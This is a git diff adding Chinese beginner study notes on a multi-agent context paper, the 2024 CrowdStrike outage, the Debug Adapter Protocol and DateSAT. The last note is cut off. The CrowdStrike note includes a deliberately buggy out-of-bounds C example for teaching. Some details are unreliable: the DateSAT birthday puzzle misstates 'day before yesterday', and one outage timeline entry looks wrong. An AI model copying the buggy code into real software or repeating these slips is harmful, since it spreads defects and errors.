扰动无内容锚定 | + +--- + +## 与相关工作的关系 + +- **Lost in the middle**(Liu et al., 2024):长上下文中间信息难用——本文扩展到**多智能体设计**,并发现存在**收敛型任务上上下文反而有益**的 regime,形成交叉而非单调恶化。 +- **Irrelevant context hurts reasoning**(Shi et al., 2023):单模型问答——本文在**多 Agent 设计**上显示无关上下文有时**优于**相关上下文。 +- **ChatDev / MetaGPT**:多按输出质量评估——本文强调 **exploration quality** 是**正交维度**。 +- **Design rationale capture**:传统假设「记录理由对未来团队总有帮助」——本文显示**仅当接收方本来不会探索时**才成立。 + +--- + +## 实践清单(给多智能体系统设计者) + +1. **把「设计探索」从「实现正确」里拆出来评估**——否则你看不见 crossover。 +2. **每个新设计任务先跑 1 次无上下文 trial**,算 tradeoff coverage(便宜、r = −0.82 预测力)。 +3. **基线 < 0.1**:优先注入 **anti-patterns**,其次 transcript;避免只给 code。 +4. **基线 0.1–0.3**:谨慎;topology 可能比 full transcript 更安全。 +5. **基线 > 0.3**:默认**不注入**相关工件;若必须注入,反模式优于 design doc/code。 +6. **检查 prompt 是否在「诱导收敛」**——越强,知识工件越无效。 +7. **不要假设 RAG 检索到的文档一定有帮助**——在高基线任务上,它可能还不如随机一篇无关文。 + +--- + +## 局限与开放问题 + +- **任务数仅 10**:相关性 r = −0.82 有力,但外推需谨慎。 +- **单一模型族 + 固定 5 Agent SA 编排**:换模型、换辩论拓扑,交叉点是否移动? +- **工件由种子组生成**:真实公司里工件质量参差,效应矩阵可能更乱。 +- **coverage 不等于最终架构质量**:探索广不等于选对;但**探索窄**几乎肯定增加**局部最优**风险。 + +--- + +## 一句话总结 + +**When Context Hurts** 的核心不是「上下文有害」,而是:**上下文对多智能体设计探索的影响符号,可由一次无上下文试验测得的基线探索度预测**——在低基线任务上,知识工件是**打破错误收敛的扰动**;在高基线任务上,同一工件是**有害的锚**。行业应从「无条件加上下文」转向 **「先测量,再条件注入」**。 + +--- + +## 延伸阅读 + +- 论文全文:[arXiv:2605.04361](https://arxiv.org/abs/2605.04361) +- HTML 版本:[arXiv HTML](https://arxiv.org/html/2605.04361v1) +- 同仓库相关笔记:[STORM 多智能体状态管理](./storm-multi-agent-state.md)、[工具调用 Agent 的记忆何时有用](./memory-tool-use-agents.md) diff --git a/src/content/docs/papers/crowdstrike-bsod-2024.md b/src/content/docs/papers/crowdstrike-bsod-2024.md new file mode 100644 index 000000000..300d2d389 --- /dev/null +++ b/src/content/docs/papers/crowdstrike-bsod-2024.md @@ -0,0 +1,316 @@ +--- +title: CrowdStrike 更新导致 Windows 蓝屏与启动死循环 +来源: https://old.reddit.com/r/crowdstrike/comments/1e6vmkf/bsod_error_in_latest_crowdstrike_update/ +日期: 2026-06-13 +分类: 操作系统 +子分类: 内核与虚拟化 +provenance: pipeline-v3 +--- + +# CrowdStrike 更新导致 Windows 蓝屏与启动死循环 + +## 一、从日常类比开始 + +想象一下:你雇了一个保安(CrowdStrike Falcon 软件)来保护你的大楼(电脑)。这个保安平时站在门口,检查每个进出的人是否有危险。一切正常。 + +某天,总部给这个保安发了一份"新规则手册"(软件更新),告诉他:"以后看到某种叫 Named Pipe 的东西,用这条新规则来判断。" + +但这份手册印错了——规则里引用了一个不存在的条款编号。保安照着手册去查,结果大脑短路了,直接原地宕机,再也醒不过来。 + +更糟糕的是,因为保安负责的是整栋楼的安全系统,他一倒,整栋楼的门禁、电梯、消防全部瘫痪。大楼里的人出不去,外面的人进不来。 + +这就是 2024 年 7 月 19 日发生的真实事件:全球大约 850 万台 Windows 电脑同时蓝屏,机场航班取消、医院停摆、银行关门。被称为"历史上规模最大的 IT 故障"。 + +--- + +## 二、什么是蓝屏(BSOD)? + +**蓝屏**(Blue Screen of Death,简称 BSOD)是 Windows 系统遇到无法恢复的错误时显示的蓝色错误画面。 + +类比理解:就像汽车的发动机突然锁死——仪表盘亮红灯,车立刻停住,你必须重启发动机才能继续开。在电脑上,就是系统内核遇到了严重错误,只能强制停止运行。 + +### 为什么会蓝屏? + +Windows 有一个叫做**内核**(Kernel)的核心程序,它掌管着电脑最重要的资源——内存、硬件驱动、进程调度。如果内核里的某个程序犯了致命错误(比如访问了不该访问的内存),Windows 就会选择蓝屏停机,以防止数据被进一步破坏。 + +这就像飞机上的"黑匣子保护机制"——一旦检测到不可控的危险,宁可迫降也不让飞机在空中解体。 + +--- + +## 三、核心概念解析 + +### 3.1 操作系统内核(Operating System Kernel) + +内核是操作系统的"心脏"。所有软件想要读写硬盘、使用内存、操控网络,都必须通过内核。 + +``` +用户程序(浏览器、微信、游戏) + ↓ +系统调用接口(API) + ↓ +┌─────────────────┐ +│ 操作系统内核 │ ← 这里是最高权限区域 +│ - 内存管理 │ +│ - 进程调度 │ +│ - 设备驱动 │ +└─────────────────┘ + ↓ +硬件(CPU、内存、硬盘、网卡) +``` + +**关键概念**:内核里的代码拥有最高权限,它的任何一个 bug 都可能直接导致整个系统崩溃。所以内核代码的质量要求极高,需要经过最严格的测试。 + +### 3.2 驱动程序(Driver) + +驱动程序是让操作系统认识特定硬件的小程序。比如显卡驱动让 Windows 知道怎么控制你的显示器。 + +安全软件(如 CrowdStrike Falcon)也会以**内核级驱动**的形式运行——它把自己嵌入到内核中,随时监控系统的每一个动作。 + +类比:保安不仅站在门口,还装了一双"透视眼",能看透大楼里发生的一切。这双眼睛直接连接到大脑(内核),所以非常强大,但也极其危险——如果这双眼睛出了问题,大脑也会跟着出错。 + +### 3.3 通道文件(Channel File) + +CrowdStrike 通过"通道文件"向客户端推送更新。每个通道文件都有一个编号,出问题的文件叫 **Channel File 291**。 + +类比:这就像保安收到的"新规则手册"的编号是第 291 号。这个手册本身不长,只有一页纸,但内容致命。 + +### 3.4 Named Pipe(命名管道) + +Named Pipe 是 Windows 系统中两个程序之间传递数据的"通道"。类似于两栋楼之间的地下管道,用来运送信息。 + +CrowdStrike 的内核驱动会检查经过这些管道的数据,判断是否有恶意行为。问题就出在对 Named Pipe 数据的处理逻辑上。 + +### 3.5 越界读取(Out-of-Bounds Memory Read) + +这是本次事件的**根本技术原因**。 + +想象你在读一本有 10 页的书,但有人告诉你去翻第 15 页——第 15 页不存在。你强行去翻,结果撕坏了整本书,甚至伤到了自己的手。 + +在计算机中,内存是一块有固定大小的区域。如果程序试图读取超出这片区域的内存地址,就会触发"非法页面错误"(Invalid Page Fault),内核立刻判定为致命错误,触发蓝屏。 + +### 3.6 启动死循环(Boot Loop) + +蓝屏之后,电脑会自动重启。但如果导致蓝屏的问题文件仍然存在,电脑每次启动都会再次蓝屏,然后再次重启——周而复始,永远无法进入桌面。 + +类比:你的汽车发动机每次启动就熄火,你反复尝试打火,但它永远点不着。 + +--- + +## 四、时间线还原 + +| 时间(UTC) | 事件 | +|---|---| +| 04:09 | CrowdStrike 向全球客户端推送了有问题的 Channel File 291 更新 | +| 05:27 | CrowdStrike 撤回(revert)了该更新 | +| 06:48 | Google Cloud 报告 Azure 虚拟机开始崩溃 | +| 07:15 | Google 确认是 CrowdStrike 更新导致的 | +| 09:45 | CrowdStrike CEO George Kurtz 确认问题并非网络攻击,修复已部署 | + +从推送到撤回只用了不到 2 小时,但已经造成约 850 万台 Windows 设备崩溃。 + +--- + +## 五、代码示例 + +### 示例 1:模拟内核驱动中的越界读取 + +下面是一个简化的 C 语言示例,展示了什么是"越界读取"。注意:这只是一个教学示例,不是 CrowdStrike 的实际代码。 + +```c +#include +#include + +// 模拟一个固定大小的缓冲区(好比那本只有10页的书) +#define BUFFER_SIZE 10 +char pipe_buffer[BUFFER_SIZE]; + +// 模拟 CrowdStrike 内核驱动检查 Named Pipe 数据的函数 +void check_named_pipe_data(char *data, int length) { + // 问题出在这里:没有检查 length 是否超过 BUFFER_SIZE + // 如果 data 的长度大于 10,就会读到不存在的内存 + for (int i = 0; i < length; i++) { + // 越界!当 i >= 10 时,pipe_buffer[i] 访问的是非法内存 + char byte = pipe_buffer[i]; + + // 内核尝试分析这个字节是否有威胁特征 + if (byte == 0xCC) { // 0xCC 是常见的断点标记 + printf("Suspicious byte detected!\n"); + } + } +} + +int main() { + // 模拟一条长度为 20 的管道数据(超过了缓冲区的10) + char malicious_data[20]; + memset(malicious_data, 0xAA, sizeof(malicious_data)); + + // 调用检查函数 —— 这会触发越界读取 + check_named_pipe_data(malicious_data, 20); + + return 0; +} +``` + +**解释**: + +- `pipe_buffer` 只有 10 个字节的空间(索引 0 到 9)。 +- `check_named_pipe_data` 函数被传入长度 20 的数据,循环会执行到 `i = 19`。 +- 当 `i >= 10` 时,`pipe_buffer[i]` 访问的是缓冲区之外的内存——这就是**越界读取**。 +- 在内核态中,这种错误不会像普通程序那样只是崩溃退出,而是会导致整个操作系统蓝屏。 + +### 示例 2:修复后的安全检查版本 + +下面是修复后的代码,加入了边界检查: + +```c +#include +#include + +#define BUFFER_SIZE 10 +char pipe_buffer[BUFFER_SIZE]; + +void check_named_pipe_data_safe(char *data, int length) { + // 第一步:检查输入参数的合法性 + if (data == NULL || length <= 0) { + printf("Invalid input parameters.\n"); + return; + } + + // 第二步:限制读取范围不超过缓冲区大小 + int safe_length = length; + if (safe_length > BUFFER_SIZE) { + safe_length = BUFFER_SIZE; + printf("Warning: Data truncated to %d bytes.\n", safe_length); + } + + // 第三步:现在循环是安全的 + for (int i = 0; i < safe_length; i++) { + char byte = pipe_buffer[i]; + + if (byte == 0xCC) { + printf("Suspicious byte detected at position %d!\n", i); + } + } +} + +int main() { + char malicious_data[20]; + memset(malicious_data, 0xAA, sizeof(malicious_data)); + + // 即使传入长度 20,函数也会安全地截断到 10 + check_named_pipe_data_safe(malicious_data, 20); + + return 0; +} +``` + +**关键改进**: + +1. **空指针检查**:确保输入的指针有效。 +2. **边界限制**:用 `safe_length` 变量把读取范围限制在缓冲区大小之内。 +3. **警告日志**:记录数据被截断的情况,方便后续排查。 + +--- + +## 六、为什么修复这么困难? + +很多人好奇:既然 CrowdStrike 在不到 2 小时内就撤回了坏更新,为什么恢复花了这么多天? + +### 6.1 已经崩溃的电脑无法远程修复 + +撤回更新只能防止**新启动**的电脑出现问题。对于那些已经蓝屏并陷入启动死循环的电脑,更新文件已经被写入了硬盘,每次启动都会被加载。 + +类比:整栋大楼的门禁系统已经锁死了。总部虽然取消了坏规则,但每栋楼里的保安系统已经记住了坏规则。你必须亲自跑到每栋楼里,手动删除那条坏规则,门才能重新打开。 + +### 6.2 需要逐台手动干预 + +受影响的电脑需要: + +1. 进入**安全模式**(Safe Mode)或 **Windows 恢复环境**(WinRE) +2. 找到并删除特定的驱动文件 +3. 重启 + +删除的文件路径是: + +``` +%windir%\System32\drivers\CrowdStrike\C-00000291-*.sys +``` + +其中 `C-00000291-` 就是 Channel File 291 的文件名前缀。 + +### 6.3 BitLocker 加密雪上加霜 + +很多企业电脑开启了 BitLocker 磁盘加密。进入安全模式时,系统会要求输入 48 位恢复密钥。如果: + +- 员工在家办公,拿不到恢复密钥 +- 恢复密钥存在已经崩溃的本地服务器上 + +那就完全没法手动修复了。 + +--- + +## 七、影响范围 + +这次事件影响了全球几乎所有主要行业: + +- **航空**:全球取消 5,078 架航班,占当天计划航班的 4.6%。达美航空取消超过 7,000 架航班,损失约 5.5 亿美元 +- **金融**:多国股市交易暂停,银行系统中断 +- **医疗**:英国 NHS 被迫退回手写处方 +- **零售**:沃尔玛、麦当劳等连锁店的 POS 终端无法刷卡 +- **媒体**:BBC、天空新闻等电视台播出中断 + +全球经济损失估计达数百亿美元。 + +--- + +## 八、反思与教训 + +### 8.1 单一供应商风险(Single Point of Failure) + +CrowdStrike 拥有超过 24,000 家客户,包括近 60% 的财富 500 强企业。当它的更新出问题,影响是灾难性的。 + +类比:全世界大部分大楼都用同一家公司的门锁系统。这家公司出了 bug,所有大楼同时进不去人。 + +### 8.2 内核级驱动的"双刃剑" + +内核级安全软件功能强大,但它的任何 bug 都是系统级的。业界需要重新审视:是否应该允许第三方软件以如此高的权限运行? + +### 8.3 更新的"灰度发布"机制缺失 + +CrowdStrike 的更新是一次性推送到所有客户端的,没有逐步放量的"灰度发布"(Canary Release)机制。如果先推送给 1% 的用户,观察没问题后再推送给其余人,这次事故就不会发生。 + +类比:新药上市前要先做临床试验。CrowdStrike 的更新相当于直接把药推向所有人,没有临床试验。 + +### 8.4 没有"延迟更新"选项 + +受影响的用户无法选择"推迟安装"更新。企业 IT 管理员希望在业务低峰期(比如周末凌晨)部署更新,但这个功能不存在。 + +--- + +## 九、关键术语表 + +| 术语 | 英文 | 简单解释 | +|---|---|---| +| 蓝屏 | BSOD | Windows 系统崩溃时显示的蓝色错误画面 | +| 内核 | Kernel | 操作系统的核心部分,掌管所有硬件资源 | +| 驱动 | Driver | 让操作系统认识特定硬件的程序 | +| 通道文件 | Channel File | CrowdStrike 推送更新的配置文件 | +| 命名管道 | Named Pipe | Windows 程序中传递数据的通道 | +| 越界读取 | Out-of-Bounds Read | 程序读取了超出分配范围的内存 | +| 启动死循环 | Boot Loop | 电脑反复重启,无法进入系统 | +| 安全模式 | Safe Mode | Windows 的一种最小化启动模式 | +| 内核态 | Kernel Mode | 操作系统中拥有最高权限的运行模式 | +| 灰度发布 | Canary Release | 先向小部分用户推送更新,观察后再全量发布 | + +--- + +## 十、延伸阅读 + +- CrowdStrike 官方事件说明:https://www.crowdstrike.com/blog/customer-guidance-significant-outage-windows-systems/ +- Microsoft 官方声明:https://www.microsoft.com/en-us/security/blog/2024/07/19/initial-analysis-of-july-19-2024-windows-client-and-server-impacts-from-third-party-content-update/ +- Wikipedia 词条:https://en.wikipedia.org/wiki/2024_CrowdStrike-related_IT_outages +- Reddit 讨论帖(来源链接):https://old.reddit.com/r/crowdstrike/comments/1e6vmkf/bsod_error_in_latest_crowdstrike_update/ + +--- + +*本文基于公开资料编写,旨在帮助零基础学习者理解此次事件的技术背景和核心概念。代码示例仅为教学用途,不代表实际生产代码。* diff --git a/src/content/docs/papers/cutlass-2020.md b/src/content/docs/papers/cutlass-2020.md index ca1877bd9..21fe629e7 100644 --- a/src/content/docs/papers/cutlass-2020.md +++ b/src/content/docs/papers/cutlass-2020.md @@ -157,6 +157,7 @@ FlashAttention 把 attention 分块流式算,每块要做 `Q·Kᵀ`、softmax - [[cudnn-2014]] —— cuDNN — 把卷积写成矩阵乘,让所有深度学习框架共享底层加速 - [[flash-attention]] —— FlashAttention — 不改算法,只改数据怎么进 GPU +- [[flashattention-2]] —— FlashAttention-2 — 更快的 Attention 与更好的并行 - [[halide]] —— Halide — 把"算什么"和"怎么算"分开写 - [[triton-2019]] —— Triton 2019 — 让 Python 写出贴近 cuBLAS 的 GPU kernel - [[tvm]] —— TVM — 让一份模型能在所有硬件上跑得快 diff --git a/src/content/docs/papers/dap-spec.md b/src/content/docs/papers/dap-spec.md new file mode 100644 index 000000000..c8bf6d0d8 --- /dev/null +++ b/src/content/docs/papers/dap-spec.md @@ -0,0 +1,315 @@ +--- +title: Debug Adapter Protocol Specification — 零基础读懂调试协议规范 +来源: https://microsoft.github.io/debug-adapter-protocol/specification +日期: 2026-06-13 +子分类: 编辑器与 IDE +分类: CLI +provenance: pipeline-v3 +--- + +## 是什么 + +**Debug Adapter Protocol Specification(DAP 规范)** 是 Microsoft 在 [microsoft.github.io/debug-adapter-protocol](https://microsoft.github.io/debug-adapter-protocol/) 上发布的正式技术文档,当前稳定版本为 **1.71.0**。它用 TypeScript 风格的 interface 精确定义了**开发工具(Client)** 与 **Debug Adapter** 之间交换的每一条 JSON 消息:字段名、类型、是否必填、语义约束,以及 Request 与 Event 的合法顺序。 + +日常类比:你买了一台「万能空调遥控器」(VS Code、Cursor、Neovim),说明书上写着:按「模式」键发 `initialize`,按「温度」键发 `setBreakpoints`,空调(Debug Adapter)必须回 `response` 或主动推 `event`。DAP 规范就是这份**遥控器与空调之间的通信说明书**——不是教你空调压缩机怎么转,而是规定「按下制冷时,遥控器发什么 JSON、空调必须回什么 JSON、什么时候主动响蜂鸣器(`stopped` event)」。各品牌空调内部电路不同(GDB、lldb、JDWP),但对外接口统一,遥控器只学一份说明书。 + +技术定义:规范分五大部分——**Base Protocol**(传输帧与三种消息基类)、**Events**(Adapter 主动推送)、**Requests**(Client 发起、需回复)、**Reverse Requests**(Adapter 反向请求 Client,如 `runInTerminal`)、**Types**(`Source`、`StackFrame`、`Variable` 等共享数据结构)。机器可读 JSON Schema 见 [debugProtocol.json](https://microsoft.github.io/debug-adapter-protocol/debugProtocol.json)。 + +## 为什么重要 + +零基础读规范,能解决这些「只会点 F5 却不知道背后发生了什么」的问题: + +- 为什么断点有时变灰——规范要求 `setBreakpoints` 返回 `verified: false` 时 Client 必须提示未生效 +- 为什么程序刚启动就停住——Adapter 在 `configurationDone` 完成前不应结束 `launch`/`attach`,但可以在入口发 `stopped`(reason: `entry`) +- 为什么单步后变量树要重新展开——`variablesReference` 在 **continue 之后失效**,这是规范写死的生命周期 +- 为什么 Neovim 能复用 VS Code 的 `debugpy`——双方实现的是同一份 Specification,不是同一份二进制 + +## 规范文档结构 + +打开 [Specification 页面](https://microsoft.github.io/debug-adapter-protocol/specification),可按目录分层阅读: + +``` +Specification +├── Base Protocol ← 帧格式、ProtocolMessage / Request / Response / Event +├── Events ← initialized, stopped, terminated, output, thread … +├── Requests ← initialize, launch, setBreakpoints, stackTrace … +├── Reverse Requests ← runInTerminal(Adapter 请 Client 开终端) +└── Types ← Source, Breakpoint, StackFrame, Variable, Capabilities … +``` + +每条 Request/Event 在规范里都有:命令名(`command` / `event` 字段值)、参数结构、响应 `body`、相关 capability 标志。实现适配器时,应把规范当**合同**:Client 按合同发,Adapter 按合同回;缺字段或乱序可能导致 VS Code 静默丢功能。 + +## 核心概念 + +### 1. Base Protocol:与 LSP 同款的「信封」 + +规范规定消息经 **stdin/stdout** 或 **TCP** 传输,每条消息 = ASCII 报头 + UTF-8 JSON: + +| 报头字段 | 含义 | +|----------|------| +| `Content-Length` | body 字节数(唯一必填报头) | + +body 中所有消息继承 `ProtocolMessage`: + +| 字段 | 类型 | 含义 | +|------|------|------| +| `seq` | number | 单调递增序号;Request 的 `seq` 用于匹配 Response 的 `request_seq` | +| `type` | string | `request` / `response` / `event` | + +三种形态: + +| type | 关键字段 | 方向 | 需回复 | +|------|----------|------|--------| +| request | `command`, `arguments?` | Client → Adapter | 是 | +| response | `request_seq`, `success`, `command`, `body?`, `message?` | Adapter → Client | — | +| event | `event`, `body?` | Adapter → Client | 否 | + +### 2. Capabilities:永远 v1 的扩展方式 + +规范**自诞生起主版本恒为 1**。新功能不靠 bump 版本,靠 `initialize` 交换的 **Capabilities** 布尔标志。字段**不存在**即表示不支持,不必写 `false`。 + +Client 常见:`supportsRunInTerminalRequest`、`supportsVariablePaging`、`supportsCancelRequest` +Adapter 常见:`supportsConfigurationDoneRequest`、`supportsConditionalBreakpoints`、`supportsEvaluateForHovers` + +### 3. Launch Sequencing:规范强制时序 + +这是读规范时最容易踩坑的一章。正确顺序: + +1. Client → `initialize` → Adapter 回 `InitializeResponse`(含 capabilities) +2. Client → `launch` 或 `attach`(可早于断点配置,但 Adapter **不应**在此时完成响应) +3. Adapter → `initialized` **event**(宣布可以收断点了) +4. Client → `setBreakpoints` / `setFunctionBreakpoints` / `setExceptionBreakpoints`(零条或多条) +5. Client → `configurationDone` +6. Adapter → 完成 `launch`/`attach` 的 **Response**,程序真正跑起来 + +违反「在 `initialized` 之前不发断点配置」会导致部分 Adapter 丢断点。 + +### 4. 暂停态瀑布:Types 章的对象引用 + +程序暂停时,Client 按规范建议的顺序拉状态: + +``` +threads → stackTrace → scopes → variables → variables(子字段) +``` + +`StackFrame` 不内嵌变量列表,而通过 `variablesReference`(正整数句柄)延迟获取。规范约定:与**当前暂停态**绑定的引用在 **continue 后失效**;`evaluate` 与 `output` 里的引用应尽量跨暂停保留。 + +### 5. setBreakpoints:全量语义 + +对**单个源文件**一次传**全部**断点(非增量)。Adapter 典型实现:清除该文件旧断点 → 应用新列表 → 在 Response 里返回**实际生效**的断点(位置可能被调试器微调)。暂时无法验证时设 `verified: false`,之后用 `breakpoint` **event** 更新 UI。 + +### 6. Reverse Requests + +少数操作必须由 Client 代劳(如在集成终端里启动被调试进程)。Adapter 发 `runInTerminal` **Reverse Request**,Client 执行后回 Response。是否支持由 Client 在 `initialize` 里声明 `supportsRunInTerminalRequest`。 + +## 代码示例 + +### 示例 1:按规范手工组帧 — `initialize` 请求 + +下面是一条符合 Base Protocol 的完整字节流(`\r\n` 为 CRLF)。Client 会话第一条消息通常是 `initialize`: + +```text +Content-Length: 156 + +{ + "seq": 1, + "type": "request", + "command": "initialize", + "arguments": { + "clientID": "study-note", + "clientName": "Study DAP Client", + "adapterID": "example", + "pathFormat": "path", + "linesStartAt1": true, + "columnsStartAt1": true, + "supportsVariableType": true, + "supportsRunInTerminalRequest": true + } +} +``` + +Adapter 必须回 `InitializeResponse`,并在 `body` 里声明能力,例如: + +```json +{ + "seq": 2, + "type": "response", + "request_seq": 1, + "success": true, + "command": "initialize", + "body": { + "supportsConfigurationDoneRequest": true, + "supportsSetVariable": true, + "supportsConditionalBreakpoints": true + } +} +``` + +随后 Adapter 发 `initialized` event(无 request_seq): + +```json +{ + "seq": 3, + "type": "event", + "event": "initialized" +} +``` + +读规范时对照 [Initialize Request](https://microsoft.github.io/debug-adapter-protocol/specification#Requests_Initialize) 与 [Capabilities](https://microsoft.github.io/debug-adapter-protocol/specification#Types_Capabilities) 两节,可核对每个字段是否实现。 + +### 示例 2:Python 最小 Debug Adapter — 处理 `stopped` 与 `stackTrace` + +用官方 [`debugpy`](https://github.com/microsoft/debugpy) 时,Adapter 已写好;下面展示**自己读规范实现时**要覆盖的最小 Request 处理逻辑(伪代码,突出规范字段): + +```python +import json +import sys + +def send(msg: dict) -> None: + body = json.dumps(msg, separators=(",", ":")).encode("utf-8") + sys.stdout.buffer.write(f"Content-Length: {len(body)}\r\n\r\n".encode("ascii")) + sys.stdout.buffer.write(body) + sys.stdout.buffer.flush() + +seq = 0 + +def reply(request: dict, body: dict | None = None, success: bool = True) -> None: + global seq + seq += 1 + send({ + "seq": seq, + "type": "response", + "request_seq": request["seq"], + "success": success, + "command": request["command"], + "body": body or {}, + }) + +while True: + headers = {} + while True: + line = sys.stdin.buffer.readline().decode("ascii").strip() + if not line: + break + k, v = line.split(": ", 1) + headers[k] = v + length = int(headers["Content-Length"]) + msg = json.loads(sys.stdin.buffer.read(length)) + + if msg["type"] == "request" and msg["command"] == "initialize": + reply(msg, { + "supportsConfigurationDoneRequest": True, + }) + send({"seq": 1, "type": "event", "event": "initialized"}) + + elif msg["command"] == "configurationDone": + reply(msg) + + elif msg["command"] == "launch": + # 规范:configurationDone 之后才能完成 launch response + reply(msg) + send({ + "seq": 2, + "type": "event", + "event": "stopped", + "body": {"reason": "entry", "threadId": 1}, + }) + + elif msg["command"] == "threads": + reply(msg, {"threads": [{"id": 1, "name": "Main Thread"}]}) + + elif msg["command"] == "stackTrace": + reply(msg, { + "stackFrames": [{ + "id": 1000, + "name": "main", + "line": 1, + "column": 1, + "source": {"path": "/tmp/demo.py", "name": "demo.py"}, + }], + "totalFrames": 1, + }) +``` + +真实 Adapter 还需实现 `disconnect`、`setBreakpoints`、`scopes`、`variables` 等;[官方 test suite](https://github.com/microsoft/debug-adapter-protocol/tree/main/test-suite) 按规范逐项验收。 + +### 示例 3:VS Code `launch.json` — Client 如何引用规范外的扩展字段 + +规范**不固定** `launch`/`attach` 的 `arguments` 字段(因语言而异)。VS Code 通过扩展的 `package.json` 贡献 JSON Schema;`launch.json` 里多出来的键由 Adapter 自行解析,例如调试 Python: + +```json +{ + "version": "0.2.0", + "configurations": [ + { + "name": "Python: Current File", + "type": "debugpy", + "request": "launch", + "program": "${file}", + "console": "integratedTerminal", + "justMyCode": true + } + ] +} +``` + +`type: "debugpy"` 告诉 Client 启动哪个 Adapter 可执行文件;`program`、`justMyCode` 等**不在 DAP 规范正文里**,但会原样放进 `launch` request 的 `arguments`,Adapter 按自己的 schema 读取。读规范时要区分:**wire 协议是统一的,launch 参数 schema 是 per-adapter 的**。 + +## 规范中的关键 Request / Event 速查 + +| 名称 | 类型 | 规范章节要点 | +|------|------|----------------| +| `initialize` | Request | 会话第一步;交换 capabilities | +| `launch` / `attach` | Request | 启动模式;arguments 由 Adapter 定义 | +| `configurationDone` | Request | 断点配置结束标志 | +| `setBreakpoints` | Request | 单文件全量断点;返回 verified 状态 | +| `continue` / `next` / `stepIn` / `stepOut` | Request | 均需 `threadId` | +| `threads` | Request | 即使单线程也必须返回至少一个 thread | +| `stackTrace` | Request | `startFrame`/`levels` 支持分页 | +| `scopes` / `variables` | Request | 通过 `variablesReference` 间接访问 | +| `evaluate` | Request | 调试控制台 / hover 求值 | +| `disconnect` / `terminate` | Request | launch 与 attach 结束语义不同 | +| `initialized` | Event | 触发断点配置阶段 | +| `stopped` | Event | `reason`: entry, breakpoint, exception, pause… | +| `output` | Event | stdout/stderr 到调试控制台 | +| `terminated` | Event | 会话结束;可带 `restart` 提示 | + +## 与姊妹协议 LSP 的对比 + +| 维度 | LSP Specification | DAP Specification | +|------|-------------------|-------------------| +| 解决问题 | 编辑期智能(补全、诊断) | 运行期调试(断点、单步、变量) | +| JSON 形态 | JSON-RPC 2.0(`method` + `id`) | 自定义(`command` + `seq`) | +| 传输帧 | Content-Length + JSON | 相同 | +| 版本 | 3.17 等显式版本 | 永久 1.x + capabilities | +| 反向调用 | 较少 | `runInTerminal` 等 Reverse Requests | + +同一工具链常成对出现:Python 用 Pylance(LSP)+ debugpy(DAP);Go 用 gopls(LSP)+ Delve DAP(DAP)。 + +## 如何系统阅读这份规范 + +1. **先读 [Overview](https://microsoft.github.io/debug-adapter-protocol/overview)** — 序列图比直接啃 Types 更友好 +2. **精读 Base Protocol + Initialize + Launch Sequencing** — 时序错了后面全错 +3. **按需查 Events / Requests** — 实现断点只读 `setBreakpoints` 与 `breakpoint` event 两节 +4. **对照 [debugProtocol.json](https://microsoft.github.io/debug-adapter-protocol/debugProtocol.json)** — 代码生成、校验测试 +5. **跑 [test-suite](https://github.com/microsoft/debug-adapter-protocol/tree/main/test-suite)** — 用机器检查是否合规范 + +## 常见误区 + +1. **把 Specification 当成 GDB 手册** — 规范描述的是 Client↔Adapter 消息,不是底层调试器 API +2. **在 `initialized` 之前调用 `setBreakpoints`** — 违反 Launch Sequencing +3. **对 `setBreakpoints` 做增量更新** — 规范要求每文件全量替换 +4. **continue 后复用旧的 `variablesReference`** — 暂停态引用已失效 +5. **认为 `launch` 参数在规范里有统一列表** — 只有 `command` 统一,`arguments` 由 Adapter 文档定义 + +## 延伸阅读 + +- [DAP Overview(架构与生命周期)](https://microsoft.github.io/debug-adapter-protocol/overview) +- [DAP Changelog](https://microsoft.github.io/debug-adapter-protocol/changelog) — 每个 capability 何时加入 +- [VS Code Debugger Extension 指南](https://code.visualstudio.com/api/extension-guides/debugger-extension) +- [@vscode/debugadapter npm](https://www.npmjs.com/package/@vscode/debugadapter) — Node.js 实现规范消息的 SDK +- 本库姊妹笔记:[Debug Adapter Protocol 总览](./debug-adapter-protocol.md)、[Language Server Protocol 规范](./language-server-protocol-spec.md) + +--- + +**一句话总结**:DAP Specification 是「调试遥控器」与「调试适配器」之间的合同——用 Content-Length 帧传递 JSON,用 capabilities 扩展功能,用严格的 Launch Sequencing 和 `variablesReference` 生命周期保证所有 IDE 共享同一套调试体验;零基础读者应先掌握时序与三种消息类型,再按实现需求查阅具体 Request/Event 章节。 diff --git a/src/content/docs/papers/datesat-a-framework-for-solving-date-and-period-constraints-arxiv-2605-25180.md b/src/content/docs/papers/datesat-a-framework-for-solving-date-and-period-constraints-arxiv-2605-25180.md new file mode 100644 index 000000000..67d4918cf --- /dev/null +++ b/src/content/docs/papers/datesat-a-framework-for-solving-date-and-period-constraints-arxiv-2605-25180.md @@ -0,0 +1,250 @@ +--- +title: DateSAT — 用逻辑求解日期与时间段约束 +来源: https://arxiv.org/abs/2605.25180 +日期: 2026-06-13 +分类: 编程语言 +子分类: 类型与 PL 理论 +provenance: pipeline-v3 +--- + +# DateSAT — 用逻辑求解日期与时间段约束 + +## 一、一个脑筋急转弯 + +> "前天我只有 25 岁,明年我就要满 28 岁了。这可能吗?" + +如果你第一次看到这个谜题,大概率会觉得不可能。但答案是:**可以**。 + +只要今天恰好是 2026 年 1 月 1 日,而你的生日是 1999 年 12 月 31 日—— + +- 前天(2025-12-31)你刚过完 26 岁生日之前的一天,按"还没到生日就算上一年"的说法,你"只有 25"; +- 今年(2026)你会满 27 岁; +- 明年(2027)你会满 28 岁。 + +这个谜题看似简单,但一旦把它写成计算机程序,就会遇到一系列麻烦:闰年、每个月天数不同、"一个月后从 1 月 31 日算起是哪天"等等。这些规则让日期计算成为软件工程中最容易出错的领域之一。 + +Azure 在 2012 年因为一个闰日 bug 全球宕机;新西兰在 2024 年因为同样的 bug 加油站全部停摆。 + +**DateSAT 要解决的就是这个问题:让计算机像解数学题一样,精确地推理日期。** + +## 二、DateSAT 是什么 + +DateSAT 是卡内基梅隆大学(CMU)的研究人员在 2026 年 5 月提出的一种框架。它是第一个专门用于**表达和求解涉及日期与日历周期(period)的可满足性约束**的系统。 + +核心思想很简单:把日期运算转换成整数算术,然后交给一个现成的 SMT 求解器(Z3)去解。 + +想象一下你在做代数题。已知: + +- x + 5 = 12 +- y - x = 3 + +求 x 和 y。SMT 求解器做的事和这个差不多,只不过它的变量可以是"日期"而不是单纯的数字。 + +DateSAT 引入了两个新概念: + +1. **Date(日期)**:用三元组 (年, 月, 日) 表示,比如 `Date(2024, 2, 29)` 就是 2024 年 2 月 29 日。 +2. **Period(时间段)**:用三元组 (年, 月, 日) 表示一段时间长度,比如 `Period(1, 2, 15)` 表示"1 年 2 